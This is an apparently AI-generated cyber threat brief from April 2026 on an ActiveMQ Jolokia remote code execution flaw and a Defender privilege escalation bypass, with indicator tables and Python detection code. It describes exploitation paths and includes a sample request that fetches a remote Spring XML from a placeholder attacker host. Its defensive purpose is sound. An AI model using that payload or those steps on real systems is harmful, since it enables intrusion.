Cyber Threat Brief — April 17 2026
⚠️ This report is AI-generated. Always validate findings.
1. Apache ActiveMQ Jolokia RCE — CVE-2026-34197
TL;DR: Authenticated (or unauthenticated on 6.0.x–6.1.1) RCE via ActiveMQ’s Jolokia API lets attackers fetch remote Spring XML configs and exec OS commands. CISA KEV added April 16; ransomware and cryptominer deployment observed ITW.
What’s New:
- Exploitation path: POST /api/jolokia/ → addNetworkConnector with a vm:// URI containing brokerConfig=xbean:http://<attacker>/evil.xml → Spring XML ResourceXmlApplicationContext instantiates beans (e.g., Runtime.exec()) before validation → RCE on the broker JVM.
- Affected: ActiveMQ Classic 5.18.0–5.18.3 and 6.0.0–6.0.2. On 6.0.0–6.1.1 Jolokia is unauthenticated due to CVE-2024-32114 — no creds needed.
- Patched in 5.19.4 and 6.2.3. CISA KEV deadline: May 6, 2026.
- ITW: multiple threat groups deploying ransomware, cryptominers, and web shells post-exploitation since early April. DFIR Report documents full kill chain from initial access → credential dumping → lateral movement → ransomware.
- Horizon3.ai PoC and detailed write-up published; Metasploit module expected imminently.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| POST /api/jolokia/ with addNetworkConnector in body | HTTP request | T1190 | WAF, reverse proxy, ActiveMQ jetty.log | Block/Alert |
| vm:// URI with brokerConfig=xbean:http in broker logs | Log entry | T1190 | ActiveMQ activemq.log | Alert — exploitation indicator |
| Outbound HTTP from ActiveMQ Java process to unexpected hosts (fetching Spring XML) | Network | T1105 | Firewall, Zeek http.log, NDR | Alert |
| Unexpected child processes of ActiveMQ Java process (/bin/sh, cmd.exe, powershell.exe) | Process chain | T1059.004 | Sysmon EID 1, EDR, 4688+CL | High-fidelity alert |
| Jolokia endpoint exposed without authentication (ports 8161, 61616) | Recon | T1190 | Shodan/Censys, ASM scan | Remediate — disable or restrict Jolokia |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No dedicated ActiveMQ Jolokia exploitation rule; write SPL for addNetworkConnector in web logs + Java child process spawning |
| Elastic | None | No rule for Jolokia API abuse; custom KQL for HTTP POST to /api/jolokia/ with brokerConfig keyword |
| Sigma | None | No rule yet; write web_activemq_jolokia_rce_cve_2026_34197.yml matching POST to Jolokia with addNetworkConnector |
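The Splunk, Elastic and Sigma gaps above all reduce to two matches: a Jolokia request carrying addNetworkConnector or brokerConfig=xbean:http, and a shell or command interpreter spawned by the broker JVM. The following is an added example (not code from Horizon3.ai, the ActiveMQ project or any other cited source) of that logic in Python, run over constructed proxy and process records. The record field names (kind, path, query, body, parent_image, parent_cmdline, image) are assumptions standing in for whatever your WAF, Zeek http.log or Sysmon pipeline emits, and ATTACKER_PLACEHOLDER is a constructed host name. Because Jetty's access log carries no request body, the HTTP check searches path, query and body together; that also covers Jolokia's URL-path form of the same operation.

```python
"""Added detection logic for the two highest-signal rows in the Actionable Intel table:
(1) a request to /api/jolokia/ carrying addNetworkConnector or brokerConfig=xbean:http (T1190),
(2) a shell or command interpreter spawned by the ActiveMQ broker JVM (T1059.004).
All records below are constructed samples; the field names are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

JOLOKIA_PATH = re.compile(r"^/api/jolokia(?:/|$)", re.IGNORECASE)
# Indicators taken from the brief: the operation name and the remote xbean config fetch.
JOLOKIA_INDICATORS = (
    re.compile(r"addNetworkConnector", re.IGNORECASE),
    re.compile(r"brokerConfig\s*=\s*xbean:https?:", re.IGNORECASE),
)
# Interpreters the broker JVM has no business spawning (process-chain row above).
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    technique: str
    reason: str
    record: Dict


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_http_record(rec: Dict) -> Optional[Finding]:
    """rec: WAF / reverse-proxy / Zeek-style record with 'path', optional 'query' and 'body'.
    Indicators are searched across path + query + body, so both the POST-body form and the
    URL-path form of a Jolokia operation are covered."""
    if not JOLOKIA_PATH.match(rec.get("path", "")):
        return None
    haystack = " ".join(str(rec.get(k, "")) for k in ("path", "query", "body"))
    hits = [p.pattern for p in JOLOKIA_INDICATORS if p.search(haystack)]
    if not hits:
        return None  # ordinary Jolokia read/list traffic from monitoring is noise, not signal
    return Finding("T1190", "Jolokia request with indicators: " + ", ".join(hits), rec)


def check_process_record(rec: Dict) -> Optional[Finding]:
    """rec: Sysmon EID 1 / EDR-style record with 'parent_image', 'parent_cmdline', 'image'."""
    if _basename(rec.get("parent_image", "")) not in {"java", "java.exe"}:
        return None
    if "activemq" not in rec.get("parent_cmdline", "").lower():
        return None  # some other JVM; out of scope for this rule
    child = _basename(rec.get("image", ""))
    if child not in SUSPICIOUS_CHILDREN:
        return None
    return Finding("T1059.004", "ActiveMQ broker JVM spawned " + child, rec)


def scan(records: Iterable[Dict]) -> List[Finding]:
    """Route each record to the matching check by its 'kind' and collect findings."""
    checks = {"http": check_http_record, "process": check_process_record}
    findings: List[Finding] = []
    for rec in records:
        check = checks.get(rec.get("kind"))
        if check is not None:
            found = check(rec)
            if found is not None:
                findings.append(found)
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_RECORDS = [
    # benign Jolokia read from a monitoring dashboard: must not alert
    {"kind": "http", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
             '"attribute":"TotalConnectionsCount"}'},
    # the exploitation pattern described in the brief, with a placeholder attacker host
    {"kind": "http", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
             '"operation":"addNetworkConnector",'
             '"arguments":["vm://localhost?brokerConfig=xbean:http://ATTACKER_PLACEHOLDER/evil.xml"]}'},
    # unrelated web-console request
    {"kind": "http", "method": "GET", "path": "/admin/queues.jsp", "body": ""},
    # broker JVM spawning a shell: high-fidelity
    {"kind": "process", "parent_image": "/usr/lib/jvm/java-17/bin/java",
     "parent_cmdline": "java -Xms64M -Dactivemq.home=/opt/activemq org.apache.activemq.console.Main start",
     "image": "/bin/sh"},
    # a different JVM spawning a shell: not this rule's concern
    {"kind": "process", "parent_image": "/usr/bin/java",
     "parent_cmdline": "java -jar /opt/other-app/app.jar", "image": "/bin/sh"},
    # Windows broker spawning a normal helper, not an interpreter
    {"kind": "process", "parent_image": r"C:\Program Files\Java\jdk-17\bin\java.exe",
     "parent_cmdline": "java.exe -Dactivemq.home=C:\\ActiveMQ org.apache.activemq.console.Main start",
     "image": r"C:\Windows\System32\conhost.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f.technique, "-", f.reason)
```

Running the block over the samples yields exactly two findings, T1190 and T1059.004; the monitoring read, the non-ActiveMQ JVM and the conhost.exe child stay silent. The same two predicates translate directly into the SPL, KQL or Sigma rule the table calls for.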
Sources: Horizon3.ai Disclosure · CISA KEV Catalog · SecurityWeek · Help Net Security
2. RedSun Bypasses April Patch for Defender LPE — CVE-2026-33825
TL;DR: Chaotic Eclipse’s RedSun PoC exploits a different Defender mechanism (cloud-file rollback) that remains unpatched after April Patch Tuesday. Huntress SOC confirms ITW exploitation of BlueHammer, RedSun, and UnDefend chains — patch alone is insufficient.
What’s New:
- RedSun (published April 15) abuses Defender’s cloud-tag file restoration: when Defender detects a cloud-tagged malicious file, it rewrites the file to its original location without validating the target path → oplock + junction redirect → arbitrary SYSTEM-context file write to C:\Windows\System32 → LPE to SYSTEM.
- April 14 Patch Tuesday (Defender Platform 4.18.26030.3011) fixed BlueHammer but NOT RedSun — the cloud-file rollback path is a separate code path.
- Huntress SOC now observing active exploitation of all three Chaotic Eclipse tools (BlueHammer, RedSun, UnDefend) in real-world intrusions.
- PoC available at github.com/Nightmare-Eclipse/RedSun; EICAR test file embedded in the PoC binary (some AV detect the PoC itself, but the researcher demonstrated an encrypted variant evading detection).
- Expected fix: Defender Platform ≥ 4.18.26050.3011; no ETA from Microsoft.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| MsMpEng.exe writing to C:\Windows\System32 outside normal signature update paths | File write | T1574.002 | Sysmon EID 11 (FileCreate), EDR file telemetry | Alert — RedSun exploitation indicator |
| Junction/symlink creation in C:\ProgramData\Microsoft\Windows Defender\ targeting System32 | File system | T1547.009 | Sysmon EID 11, USN Journal | Alert |
| cldapi.dll operations by Defender process with oplock on non-cloud files | API call | T1574.002 | ETW Microsoft-Windows-CloudFiles, EDR kernel callbacks | Hunt |
| Rapid Defender scan → cloud verdict → file restore sequence in Defender operational log | Event sequence | T1574.002 | Microsoft-Windows-Windows Defender/Operational EID 1116→1117→1121 | Correlate — abnormal restore-to-System32 path |
| RedSun PoC binary hash (check VirusTotal for current samples) | File hash | T1588.005 | EDR, AV | Block known samples |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | SAM Database File Access Attempt (adjacent) | No rule for Defender cloud-file rollback abuse; need custom SPL for MsMpEng file writes to System32 |
| Elastic | None | No rule for Defender-mediated arbitrary file write |
| Sigma | technoherder BlueHammerFix repo (7 rules) | BlueHammer rules cover ~60% of the chain; RedSun-specific cloud-file rollback path not yet covered — write win_defender_cloud_rollback_hijack.yml |
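None of the three detection sources above has a rule for the cloud-file rollback path, so here is an added example (not code from Huntress, the technoherder BlueHammerFix repo or any other cited source) in Python of the three table rows that can be checked from file and Defender telemetry: an MsMpEng.exe FileCreate into System32 outside a baseline, a reparse point under the Defender data directory that points into System32, and a Defender operational EID 1117 followed within 30 seconds by such a write. The events are constructed samples; the Sysmon field names (EventID, Image, TargetFilename) are Sysmon's own, while the FileSystem/ReparsePointCreate record shape, the allowlisted drivers\wd prefix and the 30-second window are assumptions to tune per environment, and SAMPLE_SUBDIR / SAMPLE_DROPPED.dll are placeholders.

```python
"""Added correlation logic for the Defender cloud-file rollback indicators in the table above:
(a) Sysmon EID 11 FileCreate by MsMpEng.exe under C:\\Windows\\System32 outside an
    allowlisted baseline,
(b) a reparse point (junction/symlink) under the Defender data directory pointing into System32,
(c) a Defender operational EID 1117 (action taken) followed within a short window by (a),
    i.e. the restore-to-System32 sequence the table says to correlate.
All events below are constructed samples; the allowlist and window are assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

DEFENDER_ENGINE = "msmpeng.exe"
SYSTEM32 = "c:/windows/system32"  # paths are normalised to lower-case forward slashes
# Assumed baseline of legitimate MsMpEng write locations under System32; tune per environment.
ALLOWED_SYSTEM32_PREFIXES = ("c:/windows/system32/drivers/wd/",)
DEFENDER_DATA_DIR = "c:/programdata/microsoft/windows defender/"
CORRELATION_WINDOW = timedelta(seconds=30)  # assumed; Defender restores happen within seconds


@dataclass
class Finding:
    rule: str
    ts: str
    detail: str


def _norm(path: str) -> str:
    return path.replace("\\", "/").lower()


def is_engine_write_to_system32(ev: Dict) -> bool:
    """(a): EID 11 whose Image is MsMpEng.exe and whose TargetFilename sits under System32
    but not under an allowlisted prefix."""
    if ev.get("Source") != "Sysmon" or ev.get("EventID") != 11:
        return False
    if _norm(ev.get("Image", "")).rsplit("/", 1)[-1] != DEFENDER_ENGINE:
        return False
    target = _norm(ev.get("TargetFilename", ""))
    return target.startswith(SYSTEM32 + "/") and not target.startswith(ALLOWED_SYSTEM32_PREFIXES)


def is_junction_into_system32(ev: Dict) -> bool:
    """(b): reparse-point creation under the Defender data dir whose target is in System32
    (constructed event shape standing in for USN Journal / EDR file-system telemetry)."""
    if ev.get("Source") != "FileSystem" or ev.get("EventType") != "ReparsePointCreate":
        return False
    return (_norm(ev.get("Path", "")).startswith(DEFENDER_DATA_DIR)
            and _norm(ev.get("Target", "")).startswith(SYSTEM32))


def analyze(events: List[Dict]) -> List[Finding]:
    """Apply (a) and (b) per event, then (c): a suspicious System32 write that follows a
    Defender EID 1117 within CORRELATION_WINDOW."""
    findings: List[Finding] = []
    defender_actions: List[datetime] = []  # timestamps of EID 1117 seen so far
    for ev in sorted(events, key=lambda e: e["ts"]):
        when = datetime.fromisoformat(ev["ts"])
        if ev.get("Source") == "Defender" and ev.get("EventID") == 1117:
            defender_actions.append(when)
            continue
        if is_junction_into_system32(ev):
            findings.append(Finding("Defender_Junction_To_System32", ev["ts"], ev["Path"]))
        if is_engine_write_to_system32(ev):
            findings.append(Finding("MsMpEng_System32_Write", ev["ts"], ev["TargetFilename"]))
            if any(timedelta(0) <= when - t <= CORRELATION_WINDOW for t in defender_actions):
                findings.append(Finding("Defender_Action_Then_System32_Write", ev["ts"],
                                        "EID 1117 followed by MsMpEng write into System32"))
    return findings


# Constructed sample telemetry (not real logs); the platform folder name is illustrative.
ENGINE = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26030.3011-0\MsMpEng.exe"
SAMPLE_EVENTS = [
    # routine definition update: write outside System32, benign
    {"ts": "2026-04-16T10:00:00", "Source": "Sysmon", "EventID": 11, "Image": ENGINE,
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows Defender\Definition Updates\SAMPLE\mpasbase.vdm"},
    # allowlisted System32 location (assumed baseline)
    {"ts": "2026-04-16T10:05:00", "Source": "Sysmon", "EventID": 11, "Image": ENGINE,
     "TargetFilename": r"C:\Windows\System32\drivers\wd\WdFilter.sys"},
    # Defender detection, then action taken
    {"ts": "2026-04-16T10:10:01", "Source": "Defender", "EventID": 1116},
    {"ts": "2026-04-16T10:10:02", "Source": "Defender", "EventID": 1117},
    # reparse point under the Defender data dir pointing into System32 (constructed)
    {"ts": "2026-04-16T10:10:03", "Source": "FileSystem", "EventType": "ReparsePointCreate",
     "Path": r"C:\ProgramData\Microsoft\Windows Defender\SAMPLE_SUBDIR", "Target": r"C:\Windows\System32"},
    # MsMpEng write landing in System32 seconds after the action (constructed file name)
    {"ts": "2026-04-16T10:10:05", "Source": "Sysmon", "EventID": 11, "Image": ENGINE,
     "TargetFilename": r"C:\Windows\System32\SAMPLE_DROPPED.dll"},
    # another process writing to System32: not this rule's concern
    {"ts": "2026-04-16T10:20:00", "Source": "Sysmon", "EventID": 11,
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\System32\winevt\Logs\Application.evtx"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.ts, f.rule, f.detail)
```

On the samples, the definition update and the allowlisted driver write stay quiet, while the junction, the System32 write and the 1117→write correlation each produce a finding; the correlation fires only because the write follows the Defender action inside the window, which is what separates this pattern from an unrelated MsMpEng write. The single-event predicates map onto the custom SPL and the win_defender_cloud_rollback_hijack.yml Sigma rule the table asks for; the correlation belongs in a correlation search or EDR sequence rule.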
Sources: BleepingComputer · Cybernews · CybersecurityNews · Chaotic Eclipse Blog
Status Updates
- CVE-2026-33827 (Windows TCP/IP IPv6+IPSec RCE): No public PoC yet; continue to prioritize patching IPSec-enabled hosts. Monitor Talos for Snort SID release. Original brief.
- CVE-2026-34621 (Adobe Acrobat/Reader Prototype Pollution): ITW exploitation ongoing; CISA KEV deadline May 4; APSB26-43 patch available. Original brief.
- CVE-2026-21643 (Fortinet FortiClient EMS SQLi): CISA KEV deadline passed yesterday (April 16); verify remediation status on exposed instances. Original brief.